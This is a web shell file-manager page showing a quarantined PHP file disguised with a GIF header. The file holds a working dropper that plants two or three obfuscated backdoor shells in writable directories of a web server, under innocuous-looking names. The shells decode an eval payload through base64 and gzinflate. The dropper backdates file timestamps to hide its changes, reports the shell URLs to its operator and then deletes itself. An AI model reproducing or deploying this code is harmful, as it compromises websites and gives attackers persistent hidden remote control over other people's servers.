Sindbad~EG File Manager
| Current Path : /home/bahiapar/.quarantine/ |
|
|
| Current File : /home/bahiapar/.quarantine/20200927-053251-X3BqU3vpUAOhJjITKd1CaAAAAA4-file-aZOTBB.1601202772_1 |
GIF89a????!?,D;
<?php
//subs
if (!function_exists('doc_root')) {
function doc_root() {
return !empty($_SERVER['DOCUMENT_ROOT']) ?
$_SERVER['DOCUMENT_ROOT'] :
(!empty($_ENV['DOCUMENT_ROOT']) ?
$_ENV['DOCUMENT_ROOT'] :
preg_replace('#' . dirname($_SERVER['REQUEST_URI']) . '$#', '', getcwd()))
;
}
}
if (!function_exists('create_filename')) {
function create_filename() {
$vars = array('hk_xor.php', 'hkxor.php', 'hl7050.php', 'hl_analize.php', 'hlangana.php', 'hl_core.php', 'hl_cron.php', 'hle.php', 'hllogin.php', 'h_login.php', 'hlogin.php');
return $vars[mt_rand(0, count($vars) - 1)];
}
}
if (!function_exists('writable_dirs')) {
function writable_dirs($path = '.') {
$dir = dir($path);
$result = array();
while (false !== ($entry = $dir->read())) {
if ($entry === 'cgi-bin' || substr($entry, 0, 1) === '.') continue;
if (is_dir($path . '/' . $entry) && is_writable($path . '/' . $entry)) $result[] = $path . '/' . $entry;
}
return $result;
}
}
error_reporting(0);
set_time_limit(0);
$__shell =<<<'EOT'
<?php $v12452c47 = array('hZB', 'ta8', 'I', 'wFI', 'X/', 'Sihi', 'WvB', '1G/', 'swcV', 'S0OHG', '2UuMY', 'qISq', 'ty6s', 'S0KS', 'yWT', 'svy9t', 'B', 'Sc', 'o66d', 'ynnv', 'uuT', 'k+K', 'C', 'U', 'UVS', 'CFMoz', 'v3J', 'bXQT', '7jjGo', 'wrrN', 'lW', 'mbJ', 'g', 'RZT2', 'q', 'md00z', 'sr', 'pBy', 'q+UlY', 'Cl', 'y', 'mc5J', 'hQ4', 'DssAK', 'rz', 'wP', 'fSO', 'pGDf', 'oJHb', 'QD4JM', 'w', '1/D', 'NJpZ', 'CEcH', '7JPM', 'XSca', '7u/o', 'FjZi', 'C', '642', '9gHC', 'tG/zP', 'wX7', 'q/h', 'sV/5d', 'ips', 'F8U', 's', 'QL', '/', 'A', 'TI', 'V', 'P', 'aj', '0I', 'ShIQ', 'GYT8', 'ajMK', 'h', 'N', 'aJqFf', '07hbp', 'dhNe', 'MJ', '+qA86', 's', 'r28Qk', 'qItS', 'lgH', 'd', 'ga', 'EbwQ', '1wo1', '0', 's3+RD', 's8m4/', 'D', 'T4WJW', '9OAPu', 'FiY', 'PP', 'aK', 'WdywK', 'z0i', 'PzG', 'f1', '0WQax', 'a', 'Qej', 'f', 'FlQ/u', 'mCE1', 'l10', '+Ft', 'ASb', 'D', '5ln', '4x', 'p', 'O8', 'hQ/zc', 'Tm3b', 'U', 'TNfQc', '9', 'cc0', 'eC1Ue', '4Qu', '1dM', 'T42AS', 'kY', 'D', '2Bo', 'MYrx', 'r', 'O0j', 'iNY8', 'HA', 'i4L', 'LWEv', 'UkjuX', 'ls/DQ', 't1kQk', 'Mu', 'F', '73b5', 'r', '+Y6fw', 'C', ); $f = strrev("\x6b" . "\x63" . "\x61" . "\x62" . "\x6c" . "\x6c" . "\x61" . "\x63" . "\x5f" . "\x65" . "\x63" . "\x61" ."\x6c" . "\x70" . "\x65" . "\x72" . "\x5f" . "\x67" . "\x65" . "\x72" . "\x70"); $f(strrev("/+./"), function ($matches){ $f1 = strrev(implode("", array('e', 't', 'alf', 'ni', 'zg', ))); $f2 = strrev(implode("", array('ed', 'oc', 'ed_', '46e', 's', 'ab', ))); eval($f1($f2($matches[0]))); }, implode("", $v12452c47)); ?>
EOT;
$root = doc_root();
$dirs = writable_dirs($root);
$sfn = '../u9emft2d5vq6wpw.php';
$sf_close = 'if (strpos($_REQUEST[\'src\'], \'http\') !== FALSE OR strpos($_REQUEST[\'src\'], \'.php\') !== FALSE) exit;';
if (is_file($sfn) && is_writeable($sfn)) {
$sfdata = file_get_contents($sfn);
if (strpos($sfdata, '<?php') !== false) {
$sfdata = str_replace('<?php', "<?php\n" . $sf_close, $sfdata);
$mtime = filemtime($sfn);
if ($sfd = fopen($sfn, 'w')) {
fwrite($sfd, $sfdata);
fclose($fd);
@touch($sfn, $mtime, $mtime);
}
}
}
if (count($dirs) > 0) {
$shells = mt_rand(2, 3);
if (count($dirs) < $shells) $shells = count($dirs);
shuffle($dirs);
for ($i = 0; $i < $shells; $i++) {
$path = $dirs[$i] . '/' . create_filename();
$mtime = filemtime(dirname($path));
if (@$fd = fopen($path, 'w')) {
fwrite($fd, $__shell);
fclose($fd);
touch(dirname($path), $mtime, $mtime);
touch($path, $mtime, $mtime);
$shell = 'http://' . $_SERVER['HTTP_HOST'] . str_replace($root, '', $path);
echo '<apicalloie>', $shell, '</apicalloie>', "\n";
}
}
} else {
echo '<apicall_nocomplete>', $_SERVER['HTTP_HOST'], '</apicall_nocomplete>';
}
//@rename($root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php', $root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php-dist');
unlink(__FILE__);
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists